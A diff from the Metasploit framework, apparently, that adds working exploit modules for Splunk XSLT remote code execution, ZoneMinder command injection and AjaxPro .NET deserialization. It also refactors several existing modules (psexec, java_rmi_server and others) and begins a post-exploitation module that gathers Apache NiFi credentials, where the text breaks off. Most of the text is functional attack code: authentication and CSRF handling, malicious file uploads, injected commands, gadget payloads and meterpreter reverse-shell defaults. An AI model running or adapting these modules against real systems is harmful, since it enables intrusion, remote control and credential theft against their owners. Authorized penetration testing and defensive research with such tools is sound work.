index 2838deb488..b74350a310 100644
--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -173,7 +173,13 @@ class MetasploitModule < Msf::Exploit::Remote
[ "metasploit", "RMILoader.class" ],
[ "metasploit", "RMIPayload.class" ],
]
- jar.add_files(paths, MetasploitPayloads.path('java'))
+
+ jar.add_file('metasploit/', '') # create metasploit dir
+ paths.each do |path_parts|
+ path = ['java', path_parts].flatten.join('/')
+ contents = ::MetasploitPayloads.read(path)
+ jar.add_file(path_parts.join('/'), contents)
+ end
send_response(cli, jar.pack,
{
diff --git a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
new file mode 100644
index 0000000000..c314f2fe8e
--- /dev/null
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -0,0 +1,411 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Splunk Authenticated XSLT Upload RCE',
+ 'Description' => %q{
+ This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
+ The affected versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2. The exploitation process leverages
+ a weakness in the XSLT transformation functionality of Splunk. Successful exploitation requires valid
+ credentials, typically 'admin:changeme' by default.
+
+ The exploit involves uploading a malicious XSLT file to the target system. This file, when processed by the
+ vulnerable Splunk server, leads to the execution of arbitrary code. The module then utilizes the 'runshellscript'
+ capability in Splunk to execute the payload, which can be tailored to establish a reverse shell. This provides
+ the attacker with remote control over the compromised Splunk instance. The module is designed to work
+ seamlessly, ensuring successful exploitation under the right conditions.
+ },
+ 'Author' => [
+ 'nathan', # Writeup and PoC
+ 'Valentin Lobstein', # Metasploit module
+ 'h00die', # Assistance in module development
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2023-46214'],
+ ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],
+ ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory
+ ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup
+ ],
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_PHP, ARCH_CMD],
+ 'Targets' => [['Automatic', {}]],
+ 'DisclosureDate' => '2023-11-28',
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'RPORT' => 8000
+
+ },
+ 'Privileged' => false,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),
+ OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),
+ OptString.new('RANDOM_FILENAME', [false, 'Random filename with 8 characters', Rex::Text.rand_text_alpha(8)]),
+ ]
+ )
+ end
+
+ def exploit
+ cookie_string ||= authenticate
+ unless cookie_string
+ fail_with(Failure::NoAccess, 'Authentication failed')
+ end
+
+ sleep(0.3)
+ csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)
+ unless csrf_token
+ fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')
+ end
+
+ sleep(0.3)
+ malicious_xsl = generate_malicious_xsl
+ text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)
+ unless text_value
+ fail_with(Failure::Unknown, 'File upload failed')
+ end
+
+ sleep(0.3)
+ jsid = get_job_search_id(csrf_token, updated_cookie_string)
+ unless jsid
+ fail_with(Failure::Unknown, 'Creating job failed')
+ end
+
+ sleep(0.3)
+ unless trigger_xslt_transform(jsid, text_value, updated_cookie_string)
+ fail_with(Failure::Unknown, 'XSLT Transform failed')
+ end
+
+ sleep(0.3)
+ unless trigger_payload(jsid, csrf_token, updated_cookie_string)
+ fail_with(Failure::Unknown, 'Failed to execute reverse shell')
+ end
+ end
+
+ def check
+ unless splunk?
+ return CheckCode::Unknown('Target does not appear to be a Splunk instance')
+ end
+
+ begin
+ cookie_string = authenticate
+ rescue RuntimeError
+ cookie_string = nil
+ end
+
+ unless cookie_string
+ return CheckCode::Detected('The target is Splunk but authentication failed')
+ end
+
+ version = get_version_authenticated(cookie_string)
+ return CheckCode::Detected('Unable to determine Splunk version') unless version
+
+ if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) ||
+ version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1'))
+ return CheckCode::Appears("Exploitable version found: #{version}")
+ end
+
+ CheckCode::Safe("Non-vulnerable version found: #{version}")
+ end
+
+ def trigger_payload(jsid, csrf_token, cookie_string)
+ return nil unless jsid && csrf_token
+
+ runshellscript_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
+ runshellscript_data = {
+ 'search' => "|runshellscript \"#{datastore['RANDOM_FILENAME']}.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\""
+ }
+
+ upload_headers = {
+ 'X-Requested-With' => 'XMLHttpRequest',
+ 'X-Splunk-Form-Key' => csrf_token,
+ 'Cookie' => cookie_string
+ }
+
+ print_status("Executing payload at #{runshellscript_url}")
+ res = send_request_cgi(
+ 'uri' => runshellscript_url,
+ 'method' => 'POST',
+ 'vars_post' => runshellscript_data,
+ 'headers' => upload_headers
+ )
+
+ unless res
+ print_error('Failed to execute payload: No response received')
+ return nil
+ end
+
+ if res.code == 201
+ print_good('Payload executed successfully')
+ return true
+ end
+
+ print_error("Failed to execute payload: Server returned status code #{res.code}")
+ return nil
+ end
+
+ def trigger_xslt_transform(jsid, text_value, cookie_string)
+ return nil unless jsid && text_value
+
+ exploit_endpoint = normalize_uri(target_uri.path, 'en-US', 'api', 'search', 'jobs', jsid, 'results')
+ exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/#{datastore['RANDOM_FILENAME']}.xsl"
+
+ xslt_headers = {
+ 'X-Splunk-Module' => 'Splunk.Module.DispatchingModule',
+ 'Connection' => 'close',
+ 'Upgrade-Insecure-Requests' => '1',
+ 'Accept-Language' => 'en-US,en;q=0.5',
+ 'Accept-Encoding' => 'gzip, deflate',
+ 'X-Requested-With' => 'XMLHttpRequest',
+ 'Cookie' => cookie_string
+ }
+
+ print_status("Triggering XSLT transformation at #{exploit_endpoint}")
+ res = send_request_cgi(
+ 'uri' => exploit_endpoint,
+ 'method' => 'GET',
+ 'headers' => xslt_headers
+ )
+
+ unless res
+ print_error('Failed to trigger XSLT transformation: No response received')
+ return nil
+ end
+
+ if res.code == 200
+ print_good('XSLT transformation triggered successfully')
+ return true
+ end
+
+ print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")
+ return nil
+ end
+
+ def generate_malicious_xsl
+ encoded_payload = Rex::Text.html_encode(payload.encoded)
+
+ xsl_template = <<~XSL
+
+
+
+
+ #{encoded_payload}
+
+
+
+ XSL
+
+ xsl_template
+ end
+
+ def get_job_search_id(csrf_token, cookie_string)
+ return nil unless csrf_token
+
+ jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
+
+ upload_headers = {
+ 'X-Requested-With' => 'XMLHttpRequest',
+ 'X-Splunk-Form-Key' => csrf_token,
+ 'Cookie' => cookie_string
+ }
+
+ jsid_data = {
+ 'search' => '|search test|head 1'
+ }
+
+ print_status("Sending job search request to #{jsid_url}")
+ res = send_request_cgi(
+ 'uri' => jsid_url,
+ 'method' => 'POST',
+ 'vars_post' => jsid_data,
+ 'headers' => upload_headers,
+ 'vars_get' => { 'output_mode' => 'json' }
+ )
+
+ unless res
+ print_error('Failed to initiate job search: No response received')
+ return nil
+ end
+
+ jsid = res.get_json_document['sid']
+ return jsid if jsid
+ end
+
+ def upload_malicious_file(file_content, csrf_token, cookie_string)
+ unless csrf_token
+ print_error('CSRF token not found')
+ return nil
+ end
+
+ post_data = Rex::MIME::Message.new
+ post_data.add_part(file_content, 'application/xslt+xml', nil, "form-data; name=\"spl-file\"; filename=\"#{datastore['RANDOM_FILENAME']}.xsl\"")
+
+ upload_headers = {
+ 'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*',
+ 'X-Requested-With' => 'XMLHttpRequest',
+ 'X-Splunk-Form-Key' => csrf_token,
+ 'Cookie' => cookie_string
+ }
+
+ upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview')
+
+ res = send_request_cgi(
+ 'uri' => upload_url,
+ 'method' => 'POST',
+ 'data' => post_data.to_s,
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+ 'headers' => upload_headers,
+ 'vars_get' => {
+ 'output_mode' => 'json',
+ 'props.NO_BINARY_CHECK' => 1,
+ 'input.path' => "#{datastore['RANDOM_FILENAME']}.xsl"
+ }
+ )
+
+ unless res
+ print_error('Malicious file upload failed: No response received')
+ return nil
+ end
+
+ if res.headers['Content-Type'].include?('application/json')
+ response_data = res.get_json_document
+ else
+ print_error('Response is not in JSON format')
+ return nil
+ end
+
+ if response_data.empty?
+ print_error('Failed to parse JSON or received empty JSON')
+ return nil
+ end
+
+ if response_data['messages'] && !response_data['messages'].empty?
+ text_value = response_data.dig('messages', 0, 'text')
+ if text_value.include?('concatenate')
+ print_error('Server responded with an error: concatenate found in the response')
+ return nil
+ end
+
+ print_good('Malicious file uploaded successfully')
+ return text_value
+ end
+
+ print_error('Server did not return a valid "messages" field')
+ return nil
+ end
+
+ def fetch_csrf_token(cookie_string)
+ print_status('Extracting CSRF token from cookies')
+
+ csrf_token_match = cookie_string.match(/splunkweb_csrf_token_8000=([^;]+)/)
+
+ if csrf_token_match
+ csrf_token = csrf_token_match[1]
+ print_good("CSRF token successfully extracted: #{csrf_token}")
+
+ en_us_url = normalize_uri(target_uri.path, 'en-US', 'app', 'launcher', 'home')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => en_us_url,
+ 'cookie' => cookie_string
+ })
+
+ updated_cookie_string = cookie_string
+
+ if res && res.code == 200
+ new_cookies = res.get_cookies
+ updated_cookie_string += new_cookies
+ end
+
+ return [csrf_token, updated_cookie_string]
+ end
+
+ fail_with(Failure::NotFound, 'CSRF token not found in cookies')
+ end
+
+ def get_version_authenticated(cookie_string)
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),
+ 'vars_get' => {
+ 'output_mode' => 'json'
+ },
+ 'headers' => {
+ 'Cookie' => cookie_string
+ }
+ })
+
+ return nil unless res&.code == 200
+
+ body = res.get_json_document
+ Rex::Version.new(body.dig('generator', 'version'))
+ end
+
+ def splunk?
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/en-US/account/login')
+ })
+
+ return true if res&.body =~ /Splunk/
+
+ false
+ end
+
+ def authenticate
+ login_url = normalize_uri(target_uri.path, 'en-US', 'account', 'login')
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => login_url
+ })
+
+ unless res
+ fail_with(Failure::Unreachable, 'No response received for authentication request')
+ end
+
+ cval_value = res.get_cookies.match(/cval=([^;]*)/)[1]
+
+ unless cval_value
+ fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')
+ end
+
+ auth_payload = {
+ 'username' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD'],
+ 'cval' => cval_value,
+ 'set_has_logged_in' => 'false'
+ }
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => login_url,
+ 'cookie' => res.get_cookies,
+ 'vars_post' => auth_payload
+ })
+
+ unless res && res.code == 200
+ fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')
+ end
+
+ print_good('Successfully authenticated on the Splunk instance')
+ res.get_cookies
+ end
+end
diff --git a/modules/exploits/unix/webapp/zoneminder_snapshots.rb b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
new file mode 100644
index 0000000000..e88250e695
--- /dev/null
+++ b/modules/exploits/unix/webapp/zoneminder_snapshots.rb
@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ prepend Exploit::Remote::AutoCheck
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'ZoneMinder Snapshots Command Injection',
+ 'Description' => %q{
+ This module exploits an unauthenticated command injection
+ in zoneminder that can be exploited by appending a command
+ to the "create monitor ids[]"-action of the snapshot view.
+ Affected versions: < 1.36.33, < 1.37.33
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'UnblvR', # Discovery
+ 'whotwagner' # Metasploit Module
+ ],
+ 'References' => [
+ [ 'CVE', '2023-26035' ],
+ [ 'URL', 'https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr']
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['linux', 'unix'],
+ 'Targets' => [
+ [
+ 'nix Command',
+ {
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+ 'FETCH_WRITABLE_DIR' => '/tmp'
+ }
+ }
+ ],
+ [
+ 'Linux (Dropper)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X64],
+ 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+ 'Type' => :linux_dropper
+ }
+ ],
+ ],
+ 'CmdStagerFlavor' => [ 'bourne', 'curl', 'wget', 'printf', 'echo' ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-02-24',
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])
+ ])
+ end
+
+ def check
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'GET'
+ )
+ return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
+ return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
+
+ unless res.body.include?('ZoneMinder')
+ return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')
+ end
+
+ csrf_magic = get_csrf_magic(res)
+ # This check executes a sleep-command and checks the response-time
+ sleep_time = rand(5..10)
+ data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"
+ data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+ res, elapsed_time = Rex::Stopwatch.elapsed_time do
+ send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'data' => data.to_s,
+ 'keep_cookies' => true
+ )
+ end
+ return Exploit::CheckCode::Unknown('Could not connect to the web service') unless res
+
+ print_status("Elapsed time: #{elapsed_time} seconds.")
+ if sleep_time < elapsed_time
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ Exploit::CheckCode::Safe('Target is not vulnerable')
+ end
+
+ def execute_command(cmd, _opts = {})
+ command = Rex::Text.uri_encode(cmd)
+ print_status('Sending payload')
+ data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"
+ data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic
+ send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'POST',
+ 'data' => data.to_s
+ )
+ print_good('Payload sent')
+ end
+
+ def exploit
+ # get magic csrf-token
+ print_status('Fetching CSRF Token')
+ res = send_request_cgi(
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'method' => 'GET'
+ )
+
+ if res && res.code == 200
+ # parse token
+ @csrf_magic = get_csrf_magic(res)
+ unless @csrf_magic =~ /^key:[a-f0-9]{40},\d+/
+ fail_with(Failure::UnexpectedReply, 'Unable to parse token.')
+ end
+ else
+ fail_with(Failure::UnexpectedReply, 'Unable to fetch token.')
+ end
+ print_good("Got Token: #{@csrf_magic}")
+ # send payload
+ print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+ case target['Type']
+ when :unix_cmd
+ execute_command(payload.encoded)
+ when :linux_dropper
+ execute_cmdstager
+ end
+ end
+
+ private
+
+ def get_csrf_magic(res)
+ return if res.nil?
+
+ res.get_html_document.at('//input[@name="__csrf_magic"]/@value')&.text
+ end
+end
diff --git a/modules/exploits/windows/http/ajaxpro_deserialization_rce.rb b/modules/exploits/windows/http/ajaxpro_deserialization_rce.rb
new file mode 100644
index 0000000000..a952c8eea5
--- /dev/null
+++ b/modules/exploits/windows/http/ajaxpro_deserialization_rce.rb
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ prepend Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'AjaxPro Deserialization Remote Code Execution',
+ 'Description' => %q{
+ This module leverages an insecure deserialization of data to get
+ remote code execution on the target OS in the context of the user
+ running the website which utilized AjaxPro.
+
+ To achieve code execution, the module will construct some JSON data
+ which will be sent to the target. This data will be deserialized by
+ the AjaxPro JsonDeserializer and will trigger the execution of the
+ payload.
+
+ All AjaxPro versions prior to 21.10.30.1 are vulnerable to this
+ issue, and a vulnerable method which can be used to trigger the
+ deserialization exists in the default AjaxPro namespace.
+
+ AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom
+ method that accepts a parameter of type that is assignable from
+ `ObjectDataProvider` (e.g. `object`) exists, the vulnerability can
+ still be exploited.
+
+ This module has been tested successfully against official AjaxPro on
+ version 7.7.31.1 without any modification, and on version 21.10.30.1
+ with a custom vulnerable method added.
+ },
+ 'Author' => [
+ 'Hans-Martin Münch (MOGWAI LABS)', # Discovery
+ 'Jemmy Wang' # MSF Module
+ ],
+ 'References' => [
+ ['CVE', '2021-23758'],
+ ['URL', 'https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/']
+ ],
+ 'DisclosureDate' => '2021-12-03',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['windows'],
+ 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+ 'Privileged' => false,
+ 'Targets' => [
+ [
+ 'Windows Command',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :win_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'
+ }
+ }
+ ],
+ [
+ 'Windows Dropper',
+ {
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Type' => :win_dropper,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+ 'CMDSTAGER::FLAVOR' => 'certutil'
+ },
+ 'CmdStagerFlavor' => %w[vbs certutil debug_write debug_asm tftp psh_invokewebrequest curl wget lwp-request]
+ }
+ ],
+ ],
+ 'DefaultOptions' => { 'WfsDelay' => 30 },
+ 'DefaultTarget' => 0,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [SCREEN_EFFECTS, IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'Base path to AjaxPro Handler', '/ajaxpro/']),
+ OptString.new('Namespace', [true, 'Namespace of vulnerable method', 'AjaxPro.Services.ICartService,AjaxPro.2']),
+ OptString.new('Method', [true, 'Name of vulnerable method', 'AddItem']),
+ OptString.new('Parameter', [true, 'Name of vulnerable parameter', 'item'])
+ ])
+
+ @ajax_pro = { ID: 'AjaxPro' }
+ end
+
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'core.ashx'),
+ 'keep_cookies' => true
+ )
+ unless res
+ return CheckCode::Unknown("Target did not respond to #{normalize_uri(target_uri.path, 'core.ashx')}")
+ end
+
+ unless res.code == 200 && res.headers['Content-Type'].include?('application/x-javascript')
+ return CheckCode::Safe('Is not AjaxPro?')
+ end
+
+ unless (cap = res.body.match(/ID: ?"(\S+?)",/).captures)
+ return CheckCode::Detected('Failed to get AjaxPro ID.')
+ end
+
+ @ajax_pro[:ID] = cap[0]
+
+ unless (cap = res.body.match(/version: ?"(\S+?)",/).captures)
+ return CheckCode::Detected('Failed to get AjaxPro version.')
+ end
+
+ @ajax_pro[:version] = cap[0]
+
+ if Rex::Version.new(@ajax_pro[:version]) >= Rex::Version.new('21.10.30.1')
+ return CheckCode::Safe("AjaxPro version #{@ajax_pro[:version]} is not vulnerable.")
+ end
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, datastore['Namespace'] + '.ashx'),
+ 'keep_cookies' => true
+ )
+ unless res
+ return CheckCode::Appears('Failed to check if the target method exists.')
+ end
+
+ unless res.code == 200 && res.body.match(/#{datastore['Method']}: ?function ?\((\S+?, ?)*#{datastore['Parameter']}(, ?\S+?)*\) ?\{/)
+ return CheckCode::Appears("But method '#{datastore['Method']}' with parameter '#{datastore['Parameter']}' was not found in namespace '#{datastore['Namespace']}'")
+ end
+
+ CheckCode::Appears("Confirmed target method exists and the AjaxPro version (#{@ajax_pro[:version]}) is vulnerable.")
+ end
+
+ def execute_command(cmd, _opts = {})
+ vprint_status("Executing command: #{cmd}")
+ json_post_data = JSON.generate(
+ {
+ "#{datastore['Parameter']}": {
+ __type: 'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
+ MethodName: 'Start',
+ ObjectInstance: {
+ __type: 'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
+ StartInfo: {
+ __type: 'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
+ FileName: 'cmd',
+ Arguments: "/c #{cmd}"
+ }
+ }
+ }
+ }
+ )
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, datastore['Namespace'] + '.ashx'),
+ 'ctype' => 'text/plain; charset=utf-8',
+ 'headers' => { "X-#{@ajax_pro[:ID]}-Method" => datastore['Method'] },
+ 'data' => json_post_data
+ })
+ unless res
+ fail_with(Failure::Unreachable, "Request to #{normalize_uri(target_uri.path, datastore['Namespace'] + '.ashx')} failed.")
+ end
+
+ unless res.code == 200
+ fail_with(Failure::Unknown, "Failed to execute command. Server returned #{res.code} status.")
+ end
+ end
+
+ def exploit
+ case target['Type']
+ when :win_cmd
+ execute_command(payload.encoded)
+ when :win_dropper
+ execute_cmdstager(background: true, delay: 1)
+ end
+ end
+end
diff --git a/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb b/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb
index 3504706553..8595f5662c 100644
--- a/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb
+++ b/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb
@@ -76,12 +76,12 @@ class MetasploitModule < Msf::Exploit::Local
end
def target_compatible?
- build_num = sysinfo['OS'].match(/Build (\d+)/)[1].to_i
- vprint_status("Windows Build Number = #{build_num}")
+ version = get_version_info
+ vprint_status("Windows Build Number = #{version.build_number}")
- return true if sysinfo['OS'] =~ /Windows 10/ && build_num >= 14393 && build_num <= 19045
- return true if sysinfo['OS'] =~ /Windows 11/ && build_num == 22000
- return true if sysinfo['OS'] =~ /Windows 2016\+/ && build_num >= 17763 && build_num <= 20348
+ return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_22H2)
+ return true if version.build_number == Msf::WindowsVersion::Win11_21H2
+ return true if version.build_number.between?(Msf::WindowsVersion::Server2019, Msf::WindowsVersion::Server2022)
false
end
diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
index 1702730ff3..33b91912ee 100644
--- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
+++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb
@@ -384,8 +384,8 @@ class MetasploitModule < Msf::Exploit::Local
library_path = ::File.expand_path(library_path)
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
- dll = ''
- ::File.open(library_path, 'rb') { |f| dll = f.read }
+ encrypted_dll = ::File.binread(library_path)
+ dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_dll)
patch_win32k_offsets(dll)
patch_nt_offsets(dll)
diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index 083f182fc0..b6ca12fe8f 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -21,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Auxiliary::Report
+ include Msf::OptionalSession
def initialize(info = {})
super(update_info(info,
@@ -68,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
[ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
],
'DefaultTarget' => 0,
+ 'SessionTypes' => %w[SMB],
# For the CVE, PsExec was first released around February or March 2001
'DisclosureDate' => '1999-01-01'
))
@@ -125,28 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
smbshare = 'ADMIN$'
end
- print_status("Connecting to the server...")
- connect
-
- print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
- smb_login
-
- if not simple.client.auth_user and not datastore['ALLOW_GUEST']
- print_line(" ")
- print_error(
- "FAILED! The remote host has only provided us with Guest privileges. " +
- "Please make sure that the correct username and password have been provided. " +
- "Windows XP systems that are not part of a domain will only provide Guest privileges " +
- "to network logins by default."
- )
- print_line(" ")
- disconnect
- return
- end
-
- if datastore['SMBUser'].to_s.strip.length > 0
- report_auth
- end
+ create_simple_smb_client!
case target.name
when 'Automatic'
@@ -214,4 +195,37 @@ class MetasploitModule < Msf::Exploit::Remote
login_data.merge!(service_data)
create_credential_login(login_data)
end
+
+ def create_simple_smb_client!
+ if session
+ print_status("Using existing session #{session.sid}")
+ client = session.client
+ self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+
+ else
+ print_status('Connecting to the server...')
+ connect
+
+ print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
+ smb_login
+
+ if !simple.client.auth_user && !datastore['ALLOW_GUEST']
+ print_line
+ print_error(
+ 'FAILED! The remote host has only provided us with Guest privileges. ' \
+ 'Please make sure that the correct username and password have been provided. ' \
+ 'Windows XP systems that are not part of a domain will only provide Guest privileges ' \
+ 'to network logins by default.'
+ )
+ print_line
+ disconnect
+ return
+ end
+
+ unless datastore['SMBUser'].to_s.strip.empty?
+ report_auth
+ end
+
+ end
+ end
end
diff --git a/modules/post/linux/gather/apache_nifi_credentials.rb b/modules/post/linux/gather/apache_nifi_credentials.rb
new file mode 100644
index 0000000000..7c3d644c33
--- /dev/null
+++ b/modules/post/linux/gather/apache_nifi_credentials.rb
@@ -0,0 +1,377 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::File
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Apache NiFi Credentials Gather',
+ 'Description' => %q{
+ This module will grab Apache NiFi credentials from various files on Linux.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'h00die', # Metasploit Module
+ 'Topaco', # crypto assist
+ ],
+ 'Platform' => ['linux', 'unix'],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'References' => [
+ ['URL', 'https://stackoverflow.com/questions/77391210/python-vs-ruby-aes-pbkdf2'],
+ ['URL', 'https://nifi.apache.org/docs/nifi-docs/html/administration-guide.html#nifi_sensitive_props_key']
+ ],
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [],
+ 'SideEffects' => []
+ }
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('NIFI_PATH', [false, 'NiFi folder', '/opt/nifi/']),
+ OptString.new('NIFI_PROPERTIES', [false, 'NiFi Properties file', '/opt/nifi/conf/nifi.properties']),
